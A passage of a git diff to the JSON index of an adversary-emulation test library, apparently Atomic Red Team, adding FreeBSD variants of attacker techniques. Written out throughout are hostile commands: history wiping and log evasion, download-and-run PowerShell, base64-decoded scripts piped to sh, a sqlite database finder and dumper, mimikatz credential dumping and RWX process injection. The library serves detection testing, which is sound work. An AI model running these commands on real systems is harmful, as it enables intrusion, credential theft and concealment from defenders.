get_env.rb", "systeminfo\nreg query HKLM\\SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum\n", "system_profiler\nls -al /Applications\n", - "uname -a >> /tmp/T1082.txt\nif [ -f /etc/lsb-release ]; then cat /etc/lsb-release >> /tmp/T1082.txt; fi\nif [ -f /etc/redhat-release ]; then cat /etc/redhat-release >> /tmp/T1082.txt; fi \nif [ -f /etc/issue ]; then cat /etc/issue >> /tmp/T1082.txt; fi\nuptime >> /tmp/T1082.txt\ncat /tmp/T1082.txt 2>/dev/null\n", + "uname -a >> /tmp/T1082.txt\nif [ -f /etc/lsb-release ]; then cat /etc/lsb-release >> /tmp/T1082.txt; fi\nif [ -f /etc/redhat-release ]; then cat /etc/redhat-release >> /tmp/T1082.txt; fi \nif [ -f /etc/issue ]; then cat /etc/issue >> /tmp/T1082.txt; fi\nif [ -f /etc/os-release ]; then cat /etc/os-release >> /tmp/T1082.txt; fi\nuptime >> /tmp/T1082.txt\ncat /tmp/T1082.txt 2>/dev/null\n", "if [ -f /sys/class/dmi/id/bios_version ]; then cat /sys/class/dmi/id/bios_version | grep -i amazon; fi\nif [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/product_name | grep -i \"Droplet\\|HVM\\|VirtualBox\\|VMware\"; fi\nif [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/chassis_vendor | grep -i \"Xen\\|Bochs\\|QEMU\"; fi\nif [ -x \"$(command -v dmidecode)\" ]; then sudo dmidecode | grep -i \"microsoft\\|vmware\\|virtualbox\\|quemu\\|domu\"; fi\nif [ -f /proc/scsi/scsi ]; then cat /proc/scsi/scsi | grep -i \"vmware\\|vbox\"; fi\nif [ -f /proc/ide/hd0/model ]; then cat /proc/ide/hd0/model | grep -i \"vmware\\|vbox\\|qemu\\|virtual\"; fi\nif [ -x \"$(command -v lspci)\" ]; then sudo lspci | grep -i \"vmware\\|virtualbox\"; fi\nif [ -x \"$(command -v lscpu)\" ]; then sudo lscpu | grep -i \"Xen\\|KVM\\|Microsoft\"; fi\n", "sudo lsmod | grep -i \"vboxsf\\|vboxguest\"\nsudo lsmod | grep -i \"vmw_baloon\\|vmxnet\"\nsudo lsmod | grep -i \"xen-vbd\\|xen-vnif\"\nsudo lsmod | grep -i \"virtio_pci\\|virtio_net\"\nsudo lsmod | grep -i \"hv_vmbus\\|hv_blkvsc\\|hv_netvsc\\|hv_utils\\|hv_storvsc\"\n", + "kldstat | grep -i \"vmm\"\nkldstat | grep -i \"vbox\"\n", "hostname\n", "hostname\n", "REG QUERY HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography /v MachineGuid\n", @@ -217058,6 +217777,7 @@ "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')\nInvoke-Seatbelt -Command \"-group=all\"; pause", "Import-Module \"\\..\\ExternalPayloads\\AzureStealth.ps1\" -force \n$Password = ConvertTo-SecureString -String \"T1082Az\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Password\nConnect-AzAccount -Credential $Credential\nConnect-AzureAD -Credential $Credential\nScan-AzureAdmins -UseCurrentCred\n", "lsmod\nkmod list\ngrep vmw /proc/modules\n", + "kldstat\nkldstat | grep vmm\n", "wmic cpu get name\nwmic MEMPHYSICAL get MaxCapacity\nwmic baseboard get product\nwmic baseboard get version\nwmic bios get SMBIOSBIOSVersion\nwmic path win32_VideoController get name\nwmic path win32_VideoController get DriverVersion\nwmic path win32_VideoController get VideoModeDescription\nwmic OS get Caption,OSArchitecture,Version\nwmic DISKDRIVE get Caption\nGet-WmiObject win32_bios\n", "driverquery /v\ndriverquery /si\n", "wscript.exe C:\\Windows\\System32\\gatherNetworkInfo.vbs\n", @@ -217212,7 +217932,7 @@ } }, "executor": { - "command": "uname -a >> #{output_file}\nif [ -f /etc/lsb-release ]; then cat /etc/lsb-release >> #{output_file}; fi\nif [ -f /etc/redhat-release ]; then cat /etc/redhat-release >> #{output_file}; fi \nif [ -f /etc/issue ]; then cat /etc/issue >> #{output_file}; fi\nuptime >> #{output_file}\ncat #{output_file} 2>/dev/null\n", + "command": "uname -a >> #{output_file}\nif [ -f /etc/lsb-release ]; then cat /etc/lsb-release >> #{output_file}; fi\nif [ -f /etc/redhat-release ]; then cat /etc/redhat-release >> #{output_file}; fi \nif [ -f /etc/issue ]; then cat /etc/issue >> #{output_file}; fi\nif [ -f /etc/os-release ]; then cat /etc/os-release >> #{output_file}; fi\nuptime >> #{output_file}\ncat #{output_file} 2>/dev/null\n", "cleanup_command": "rm #{output_file} 2>/dev/null\n", "name": "sh" } @@ -217242,6 +217962,18 @@ "name": "bash" } }, + { + "name": "FreeBSD VM Check via Kernel Modules", + "auto_generated_guid": "eefe6a49-d88b-41d8-8fc2-b46822da90d3", + "description": "Identify virtual machine host kernel modules.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "kldstat | grep -i \"vmm\"\nkldstat | grep -i \"vbox\"\n", + "name": "sh" + } + }, { "name": "Hostname Discovery (Windows)", "auto_generated_guid": "85cfbf23-4a1e-4342-8792-007e004b975f", @@ -217257,14 +217989,14 @@ { "name": "Hostname Discovery", "auto_generated_guid": "486e88ea-4f56-470f-9b57-3f4d73f39133", - "description": "Identify system hostname for Linux and macOS systems.\n", + "description": "Identify system hostname for FreeBSD, Linux and macOS systems.\n", "supported_platforms": [ "linux", "macos" ], "executor": { "command": "hostname\n", - "name": "bash" + "name": "sh" } }, { @@ -217320,12 +218052,12 @@ } }, { - "name": "Environment variables discovery on macos and linux", + "name": "Environment variables discovery on freebsd, macos and linux", "auto_generated_guid": "fcbdd43f-f4ad-42d5-98f3-0218097e2720", "description": "Identify all environment variables. Upon execution, environments variables and your path info will be displayed.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "executor": { "command": "env\n", @@ -217521,6 +218253,18 @@ "name": "sh" } }, + { + "name": "FreeBSD List Kernel Modules", + "auto_generated_guid": "4947897f-643a-4b75-b3f5-bed6885749f6", + "description": "Enumerate kernel modules loaded. Upon successful execution stdout will display kernel modules loaded, followed by list of modules matching 'vmm' if present.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "kldstat\nkldstat | grep vmm\n", + "name": "sh" + } + }, { "name": "System Information Discovery with WMIC", "auto_generated_guid": "8851b73a-3624-4bf7-8704-aa312411565c", @@ -228343,9 +229087,9 @@ "display_name": "Browser Extensions", "atomic_tests": [ { - "name": "Chrome (Developer Mode)", + "name": "Chrome/Chromium (Developer Mode)", "auto_generated_guid": "3ecd790d-2617-4abf-9a8c-4e8d47da9ee1", - "description": "Turn on Chrome developer mode and Load Extension found in the src directory", + "description": "Turn on Chrome/Chromium developer mode and Load Extension found in the src directory", "supported_platforms": [ "linux", "windows", @@ -228357,7 +229101,7 @@ } }, { - "name": "Chrome (Chrome Web Store)", + "name": "Chrome/Chromium (Chrome Web Store)", "auto_generated_guid": "4c83940d-8ca5-4bb2-8100-f46dc914bc3f", "description": "Install the \"Minimum Viable Malicious Extension\" Chrome extension", "supported_platforms": [ @@ -232713,14 +233457,21 @@ ], "command_list": [ "rm ~/.bash_history\n", + "rm ~/.sh_history\n", "echo \"\" > ~/.bash_history\n", + "echo \"\" > ~/.sh_history\n", "cat /dev/null > ~/.bash_history\n", + "cat /dev/null > ~/.sh_history\n", "ln -sf /dev/null ~/.bash_history\n", + "ln -sf /dev/null ~/.sh_history\n", "truncate -s0 ~/.bash_history\n", + "truncate -s0 ~/.sh_history\n", "unset HISTFILE\nexport HISTFILESIZE=0\nhistory -c\n", + "unset HISTFILE\nunset histfile\nexport HISTFILESIZE=0\nexport HISTSIZE=0\nhistory -c\n", "set +o history\necho 'set +o history' >> ~/.bashrc\n. ~/.bashrc\nhistory -c\n", "hostname\nwhoami\n", "sshpass -p 'pwd101!' ssh testuser1@localhost -T hostname\n", + "sshpass -p 'pwd101!' ssh testuser1@localhost -T hostname\n", "Set-PSReadlineOption -HistorySaveStyle SaveNothing\n", "Remove-Item (Get-PSReadlineOption).HistorySavePath\n", "Set-PSReadLineOption -AddToHistoryHandler { return $false }\n", @@ -232751,10 +233502,22 @@ "name": "sh" } }, + { + "name": "Clear sh history (rm)", + "auto_generated_guid": "448893f8-1d5d-4ae2-9017-7fcd73a7e100", + "description": "Clears sh history via rm\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "rm ~/.sh_history\n", + "name": "sh" + } + }, { "name": "Clear Bash history (echo)", "auto_generated_guid": "cbf506a5-dd78-43e5-be7e-a46b7c7a0a11", - "description": "Clears bash history via rm\n", + "description": "Clears bash history via echo\n", "supported_platforms": [ "linux" ], @@ -232763,6 +233526,18 @@ "name": "sh" } }, + { + "name": "Clear sh history (echo)", + "auto_generated_guid": "a4d63cb3-9ed9-4837-9480-5bf6b09a6c96", + "description": "Clears sh history via echo\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "echo \"\" > ~/.sh_history\n", + "name": "sh" + } + }, { "name": "Clear Bash history (cat dev/null)", "auto_generated_guid": "b1251c35-dcd3-4ea1-86da-36d27b54f31f", @@ -232776,6 +233551,18 @@ "name": "sh" } }, + { + "name": "Clear sh history (cat dev/null)", + "auto_generated_guid": "ecaefd53-6fa4-4781-ba51-d9d6fb94dbdc", + "description": "Clears sh history via cat /dev/null\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "cat /dev/null > ~/.sh_history\n", + "name": "sh" + } + }, { "name": "Clear Bash history (ln dev/null)", "auto_generated_guid": "23d348f3-cc5c-4ba9-bd0a-ae09069f0914", @@ -232789,6 +233576,18 @@ "name": "sh" } }, + { + "name": "Clear sh history (ln dev/null)", + "auto_generated_guid": "3126aa7a-8768-456f-ae05-6ab2d4accfdd", + "description": "Clears sh history via a symlink to /dev/null\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "ln -sf /dev/null ~/.sh_history\n", + "name": "sh" + } + }, { "name": "Clear Bash history (truncate)", "auto_generated_guid": "47966a1d-df4f-4078-af65-db6d9aa20739", @@ -232801,6 +233600,18 @@ "name": "sh" } }, + { + "name": "Clear sh history (truncate)", + "auto_generated_guid": "e14d9bb0-c853-4503-aa89-739d5c0a5818", + "description": "Clears sh history via truncate\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "truncate -s0 ~/.sh_history\n", + "name": "sh" + } + }, { "name": "Clear history of a bunch of shells", "auto_generated_guid": "7e6721df-5f08-4370-9255-f06d8a77af4c", @@ -232814,6 +233625,18 @@ "name": "sh" } }, + { + "name": "Clear history of a bunch of shells (freebsd)", + "auto_generated_guid": "9bf7c8af-5e12-42ea-bf6b-b0348fb9dfb0", + "description": "Clears the history of a bunch of different shell types by setting the history size to zero\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "unset HISTFILE\nunset histfile\nexport HISTFILESIZE=0\nexport HISTSIZE=0\nhistory -c\n", + "name": "sh" + } + }, { "name": "Clear and Disable Bash History Logging", "auto_generated_guid": "784e4011-bd1a-4ecd-a63a-8feb278512e6", @@ -232861,6 +233684,26 @@ "name": "sh" } }, + { + "name": "Disable sh History Logging with SSH -T (freebsd)", + "auto_generated_guid": "ec3f2306-dd19-4c4b-bed7-92d20e9b1dee", + "description": "Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog\n", + "supported_platforms": [ + "linux" + ], + "dependencies": [ + { + "description": "Install sshpass and create user account used for excuting\n", + "prereq_command": "$(getent passwd testuser1 >/dev/null) && $(which sshpass >/dev/null)\n", + "get_prereq_command": "pw useradd testuser1 -g wheel -s /bin/sh\necho 'pwd101!' | pw mod user testuser1 -h 0\n(which pkg && pkg install -y sshpass)\n" + } + ], + "executor": { + "command": "sshpass -p 'pwd101!' ssh testuser1@localhost -T hostname\n", + "cleanup_command": "rmuser -y testuser1\n", + "name": "sh" + } + }, { "name": "Prevent Powershell History Logging", "auto_generated_guid": "2f898b81-3e97-4abb-bc3f-a95138988370", @@ -235050,6 +235893,7 @@ ], "command_list": [ "$startingDirectory = \"C:\\Users\"\n$outputZip = \"\\..\\ExternalPayloads\\T1005\"\n$fileExtensionsString = \".doc, .docx, .txt\" \n$fileExtensions = $fileExtensionsString -split \", \"\n\nNew-Item -Type Directory $outputZip -ErrorAction Ignore -Force | Out-Null\n\nFunction Search-Files {\n param (\n [string]$directory\n )\n $files = Get-ChildItem -Path $directory -File -Recurse | Where-Object {\n $fileExtensions -contains $_.Extension.ToLower()\n }\n return $files\n}\n\n$foundFiles = Search-Files -directory $startingDirectory\nif ($foundFiles.Count -gt 0) {\n $foundFilePaths = $foundFiles.FullName\n Compress-Archive -Path $foundFilePaths -DestinationPath \"$outputZip\\data.zip\"\n\n Write-Host \"Zip file created: $outputZip\\data.zip\"\n } else {\n Write-Host \"No files found with the specified extensions.\"\n }\n", + "cd $HOME\ncurl -O https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1005/src/art\ncurl -O https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1005/src/gta.db\ncurl -O https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1005/src/sqlite_dump.sh\nchmod +x sqlite_dump.sh\nfind . ! -executable -exec bash -c 'if [[ \"$(head -c 15 {} | strings)\" == \"SQLite format 3\" ]]; then echo \"{}\"; ./sqlite_dump.sh {}; fi' \\;\n", "powershell/collection/get_sql_column_sample_data", "powershell/collection/get_sql_query", "powershell/collection/minidump", @@ -235110,6 +235954,34 @@ "name": "powershell", "elevation_required": false } + }, + { + "name": "Find and dump sqlite databases (Linux)", + "auto_generated_guid": "00cbb875-7ae4-4cf1-b638-e543fd825300", + "description": "An adversary may know/assume that the user of a system uses sqlite databases which contain interest and sensitive data. In this test we download two databases and a sqlite dump script, then run a find command to find & dump the database content.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "remote_url": { + "description": "url of remote payload", + "type": "url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1005/src" + } + }, + "dependencies": [ + { + "description": "Check if running on a Debian based machine.\n", + "prereq_command": "if [ -x \"$(command -v sqlite3)\" ]; then echo \"sqlite3 is installed\"; else echo \"sqlite3 is NOT installed\"; exit 1; fi\nif [ -x \"$(command -v curl)\" ]; then echo \"curl is installed\"; else echo \"curl is NOT installed\"; exit 1; fi\nif [ -x \"$(command -v strings)\" ]; then echo \"strings is installed\"; else echo \"strings is NOT installed\"; exit 1; fi\n", + "get_prereq_command": "if grep -iq \"debian\\|ubuntu\\|kali\\|mint\" /usr/lib/os-release; then apt update && apt install -y binutils curl sqlite3; fi\nif grep -iq \"rhel\\|fedora\\|centos\" /usr/lib/os-release; then yum update -y && yum install -y binutils curl sqlite-devel; fi\n" + } + ], + "executor": { + "name": "bash", + "elevation_required": false, + "command": "cd $HOME\ncurl -O #{remote_url}/art\ncurl -O #{remote_url}/gta.db\ncurl -O #{remote_url}/sqlite_dump.sh\nchmod +x sqlite_dump.sh\nfind . ! -executable -exec bash -c 'if [[ \"$(head -c 15 {} | strings)\" == \"SQLite format 3\" ]]; then echo \"{}\"; ./sqlite_dump.sh {}; fi' \\;\n", + "cleanup_command": "rm -f $HOME/.art\nrm -f $HOME/gta.db\nrm -f $HOME/sqlite_dump.sh \n" + } } ] } @@ -235623,6 +236495,8 @@ "ENCODED=$(python3 -c 'import base64;enc=base64.b64encode(\"Hello from Atomic Red Team test T1140!\".encode());print(enc.decode())')\npython3 -c \"import base64;dec=base64.b64decode(\\\"$ENCODED\\\");print(dec.decode())\"\npython3 -c \"import base64 as d;dec=d.b64decode(\\\"$ENCODED\\\");print(dec.decode())\"\npython3 -c \"from base64 import b64decode;dec=b64decode(\\\"$ENCODED\\\");print(dec.decode())\"\npython3 -c \"from base64 import b64decode as d;dec=d(\\\"$ENCODED\\\");print(dec.decode())\"\necho $ENCODED | python3 -c \"import base64,sys;dec=base64.b64decode(sys.stdin.read());print(dec.decode())\"\necho $ENCODED > /tmp/T1140.encoded && python3 -c \"import base64;dec=base64.b64decode(open('/tmp/T1140.encoded').read());print(dec.decode())\"\n", "ENCODED=$(perl -e \"use MIME::Base64;print(encode_base64('Hello from Atomic Red Team test T1140!'));\")\nperl -le \"use MIME::Base64;print(decode_base64('$ENCODED'));\"\necho $ENCODED | perl -le 'use MIME::Base64;print(decode_base64());'\necho $ENCODED > /tmp/T1140.encoded && perl -le 'use MIME::Base64;open($f,\"<\",\"/tmp/T1140.encoded\");print(decode_base64(<$f>));'\n", "ENCODED=$(echo 'Hello from Atomic Red Team test T1140!' | base64)\nprintf $ENCODED | base64 -d\necho $ENCODED | base64 -d\necho $(echo $ENCODED) | base64 -d\necho $ENCODED > /tmp/T1140.encoded && base64 -d /tmp/T1140.encoded\necho $ENCODED > /tmp/T1140.encoded && base64 -d < /tmp/T1140.encoded\necho $ENCODED > /tmp/T1140.encoded && cat /tmp/T1140.encoded | base64 -d\necho $ENCODED > /tmp/T1140.encoded && cat < /tmp/T1140.encoded | base64 -d\nbash -c \"{echo,\\\"$(echo $ENCODED)\\\"}|{base64,-d}\"\n", + "ENCODED=$(echo 'Hello from Atomic Red Team test T1140!' | b64encode -r -)\nprintf $ENCODED | b64decode -r\necho $ENCODED | b64decode -r\necho $(echo $ENCODED) | b64decode -r\necho $ENCODED > /tmp/T1140.encoded && b64encode -r /tmp/T1140.encoded\necho $ENCODED > /tmp/T1140.encoded && b64decode -r < /tmp/T1140.encoded\necho $ENCODED > /tmp/T1140.encoded && cat /tmp/T1140.encoded | b64decode -r\necho $ENCODED > /tmp/T1140.encoded && cat < /tmp/T1140.encoded | b64decode -r\n", + "echo IyEvYmluL2Jhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo= | b64decode -r | sh\necho IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo= | b64decode -r | sh\necho IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo= | b64decode -r | sh\necho IyEvYmluL3NoCmVjaG8gImh0dHBzOi8vd3d3LnlvdXR1YmUuY29tL0BhdG9taWNzb25hZnJpZGF5IEZUVyIK | b64decode -r | sh\n", "ENCODED=$(echo 'Hello from Atomic Red Team test T1140!' | xxd -ps -c 256)\nprintf $ENCODED | xxd -r -p\necho $ENCODED | xxd -r -p\necho $(echo $ENCODED) | xxd -r -p\necho $ENCODED > /tmp/T1140.encoded && xxd -r -p /tmp/T1140.encoded\necho $ENCODED > /tmp/T1140.encoded && xxd -r -p < /tmp/T1140.encoded\necho $ENCODED > /tmp/T1140.encoded && cat /tmp/T1140.encoded | xxd -r -p\necho $ENCODED > /tmp/T1140.encoded && cat < /tmp/T1140.encoded | xxd -r -p\n", "echo IyEvYmluL2Jhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo= | base64 -d | bash\necho IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo= | base64 -d | bash\necho IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo= | base64 -d | bash\necho IyEvYmluL3NoCmVjaG8gImh0dHBzOi8vd3d3LnlvdXR1YmUuY29tL0BhdG9taWNzb25hZnJpZGF5IEZUVyIK | base64 -d | bash\n", "python3 -c 'import base64; import subprocess; xor_decrypt = lambda text, key: \"\".join([chr(c ^ ord(k)) for c, k in zip(base64.b64decode(text.encode()), key)]); command = \"AAkqKQEM\"; key = \"waEHleblxiQjoxFJQaIMLdHKz\"; exec = xor_decrypt(command, key); subprocess.call(exec, shell=True)'", @@ -235990,7 +236864,7 @@ { "name": "Base64 decoding with Perl", "auto_generated_guid": "6604d964-b9f6-4d4b-8ce8-499829a14d0a", - "description": "Use Perl to decode a base64-encoded text string and echo it to the console\n", + "description": "Use Perl to decode a base64-encoded text string and echo it to the console \n", "supported_platforms": [ "linux", "macos" @@ -236046,6 +236920,73 @@ "command": "ENCODED=$(echo '#{message}' | base64)\nprintf $ENCODED | base64 -d\necho $ENCODED | base64 -d\necho $(echo $ENCODED) | base64 -d\necho $ENCODED > #{encoded_file} && base64 -d #{encoded_file}\necho $ENCODED > #{encoded_file} && base64 -d < #{encoded_file}\necho $ENCODED > #{encoded_file} && cat #{encoded_file} | base64 -d\necho $ENCODED > #{encoded_file} && cat < #{encoded_file} | base64 -d\nbash -c \"{echo,\\\"$(echo $ENCODED)\\\"}|{base64,-d}\"\n" } }, + { + "name": "Base64 decoding with shell utilities (freebsd)", + "auto_generated_guid": "b6097712-c42e-4174-b8f2-4b1e1a5bbb3d", + "description": "Use common shell utilities to decode a base64-encoded text string and echo it to the console\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "message": { + "description": "Message to print to the screen", + "type": "string", + "default": "Hello from Atomic Red Team test T1140!" + }, + "encoded_file": { + "description": "File to temporarily save encoded text", + "type": "path", + "default": "/tmp/T1140.encoded" + } + }, + "executor": { + "name": "sh", + "elevation_required": false, + "command": "ENCODED=$(echo '#{message}' | b64encode -r -)\nprintf $ENCODED | b64decode -r\necho $ENCODED | b64decode -r\necho $(echo $ENCODED) | b64decode -r\necho $ENCODED > #{encoded_file} && b64encode -r #{encoded_file}\necho $ENCODED > #{encoded_file} && b64decode -r < #{encoded_file}\necho $ENCODED > #{encoded_file} && cat #{encoded_file} | b64decode -r\necho $ENCODED > #{encoded_file} && cat < #{encoded_file} | b64decode -r\n" + } + }, + { + "name": "FreeBSD b64encode Shebang in CLI", + "auto_generated_guid": "18ee2002-66e8-4518-87c5-c0ec9c8299ac", + "description": "Using b64decode shell scripts that have Shebang in them. This is commonly how attackers obfuscate passing and executing a shell script. Seen [here](https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html) by TrendMicro, as well as [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS). Also a there is a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml) for it. \n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "bash_encoded": { + "description": "Encoded", + "type": "string", + "default": "IyEvYmluL2Jhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=" + }, + "dash_encoded": { + "description": "Encoded", + "type": "string", + "default": "IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=" + }, + "fish_encoded": { + "description": "Encoded", + "type": "string", + "default": "IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=" + }, + "sh_encoded": { + "description": "Encoded", + "type": "string", + "default": "IyEvYmluL3NoCmVjaG8gImh0dHBzOi8vd3d3LnlvdXR1YmUuY29tL0BhdG9taWNzb25hZnJpZGF5IEZUVyIK" + } + }, + "dependencies": [ + { + "description": "b64decode must be present\n", + "prereq_command": "which b64decode\n", + "get_prereq_command": "echo \"please install b64decode\"\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": false, + "command": "echo #{bash_encoded} | b64decode -r | sh\necho #{dash_encoded} | b64decode -r | sh\necho #{fish_encoded} | b64decode -r | sh\necho #{sh_encoded} | b64decode -r | sh\n" + } + }, { "name": "Hex decoding with shell utilities", "auto_generated_guid": "005943f9-8dd5-4349-8b46-0313c0a9f973", @@ -260307,7 +261248,7 @@ "display_name": "Archive Collected Data: Archive via Library", "atomic_tests": [ { - "name": "Compressing data using GZip in Python (Linux)", + "name": "Compressing data using GZip in Python (FreeBSD/Linux)", "auto_generated_guid": "391f5298-b12d-4636-8482-35d9c17d53a8", "description": "Uses GZip from Python to compress files\n", "supported_platforms": [ @@ -260325,7 +261266,7 @@ "default": "/tmp/passwd.gz" } }, - "dependency_executor_name": "bash", + "dependency_executor_name": "sh", "dependencies": [ { "description": "Requires Python\n", @@ -260334,14 +261275,14 @@ } ], "executor": { - "name": "bash", + "name": "sh", "elevation_required": false, "command": "which_python=`which python || which python3`\n$which_python -c \"import gzip;input_file=open('#{path_to_input_file}', 'rb');content=input_file.read();input_file.close();output_file=gzip.GzipFile('#{path_to_output_file}','wb',compresslevel=6);output_file.write(content);output_file.close();\"\n", "cleanup_command": "rm #{path_to_output_file}\n" } }, { - "name": "Compressing data using bz2 in Python (Linux)", + "name": "Compressing data using bz2 in Python (FreeBSD/Linux)", "auto_generated_guid": "c75612b2-9de0-4d7c-879c-10d7b077072d", "description": "Uses bz2 from Python to compress files\n", "supported_platforms": [ @@ -260359,7 +261300,7 @@ "default": "/tmp/passwd.bz2" } }, - "dependency_executor_name": "bash", + "dependency_executor_name": "sh", "dependencies": [ { "description": "Requires Python\n", @@ -260368,14 +261309,14 @@ } ], "executor": { - "name": "bash", + "name": "sh", "elevation_required": false, "command": "which_python=`which python || which python3`\n$which_python -c \"import bz2;input_file=open('#{path_to_input_file}','rb');content=input_file.read();input_file.close();bz2content=bz2.compress(content,compresslevel=9);output_file=open('#{path_to_output_file}','w+');output_file.write(str(bz2content));output_file.close();\"\n", "cleanup_command": "rm #{path_to_output_file}\n" } }, { - "name": "Compressing data using zipfile in Python (Linux)", + "name": "Compressing data using zipfile in Python (FreeBSD/Linux)", "auto_generated_guid": "001a042b-859f-44d9-bf81-fd1c4e2200b0", "description": "Uses zipfile from Python to compress files\n", "supported_platforms": [ @@ -260393,7 +261334,7 @@ "default": "/tmp/passwd.zip" } }, - "dependency_executor_name": "bash", + "dependency_executor_name": "sh", "dependencies": [ { "description": "Requires Python\n", @@ -260402,14 +261343,14 @@ } ], "executor": { - "name": "bash", + "name": "sh", "elevation_required": false, "command": "which_python=`which python || which python3`\n$which_python -c \"from zipfile import ZipFile; ZipFile('#{path_to_output_file}', mode='w').write('#{path_to_input_file}')\"\n", "cleanup_command": "rm #{path_to_output_file}\n" } }, { - "name": "Compressing data using tarfile in Python (Linux)", + "name": "Compressing data using tarfile in Python (FreeBSD/Linux)", "auto_generated_guid": "e86f1b4b-fcc1-4a2a-ae10-b49da01458db", "description": "Uses tarfile from Python to compress files\n", "supported_platforms": [ @@ -260427,7 +261368,7 @@ "default": "/tmp/passwd.tar.gz" } }, - "dependency_executor_name": "bash", + "dependency_executor_name": "sh", "dependencies": [ { "description": "Requires Python\n", @@ -260436,7 +261377,7 @@ } ], "executor": { - "name": "bash", + "name": "sh", "elevation_required": false, "command": "which_python=`which python || which python3`\n$which_python -c \"from zipfile import ZipFile; ZipFile('#{path_to_output_file}', mode='w').write('#{path_to_input_file}')\" \n", "cleanup_command": "rm #{path_to_output_file}\n" @@ -269295,6 +270236,7 @@ "\"\\..\\ExternalPayloads\\PsExec.exe\" /accepteula \\\\DC1 -c %tmp%\\mimikatz\\x64\\mimikatz.exe \"lsadump::lsa /inject /id:500\" \"exit\"\n", "$notepad = Start-Process notepad -passthru\nStart-Process \"$PathToAtomicsFolder\\T1055\\bin\\x64\\InjectView.exe\"\n", "Start-Process \"\\T1055\\bin\\x64\\redVanity.exe\" (Start-Process calc.exe -PassThru).Id\n", + "$address = (& \"\\T1055\\bin\\x64\\searchVuln.exe\" \"\\T1055\\bin\\x64\\vuln_dll\\\" | Out-String | Select-String -Pattern \"VirtualAddress: (\\w+)\").Matches.Groups[1].Value\n& \"\\T1055\\bin\\x64\\RWXinjectionLocal.exe\" \"\\T1055\\bin\\x64\\vuln_dll\\msys-2.0.dll\" $address\n", "powershell/code_execution/invoke_dllinjection", "powershell/code_execution/invoke_reflectivepeinjection", "powershell/code_execution/invoke_shellcode", @@ -270093,6 +271035,35 @@ "name": "powershell", "elevation_required": false } + }, + { + "name": "Read-Write-Execute process Injection", + "auto_generated_guid": "49543237-25db-497b-90df-d0a0a6e8fe2c", + "description": "This test exploited the vulnerability in legitimate PE formats where sections have RWX permission and enough space for shellcode.\nThe RWX injection avoided the use of VirtualAlloc, WriteVirtualMemory, and ProtectVirtualMemory, thus evading detection mechanisms \nthat relied on API call sequences and heuristics. The RWX injection utilises API call sequences: LoadLibrary --> GetModuleInformation --> GetModuleHandleA --> RtlCopyMemory --> CreateThread.\nThe injected shellcode will open a message box and a notepad.\nRWX Process Injection, also known as MockingJay, was introduced to the security community by SecurityJoes.\nMore details can be found at https://www.securityjoes.com/post/process-mockingjay-echoing-rwx-in-userland-to-achieve-code-execution.\nThe original injector and idea were developed for game cheats, as visible at https://github.com/M-r-J-o-h-n/SWH-Injector.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "vuln_dll": { + "description": "vulnerable DLL", + "type": "path", + "default": "PathToAtomicsFolder\\T1055\\bin\\x64\\vuln_dll\\msys-2.0.dll" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Utility to inject must exist on disk at specified location (#{vuln_dll})\n", + "prereq_command": "if (Test-Path \"#{vuln_dll}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{vuln_dll}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest 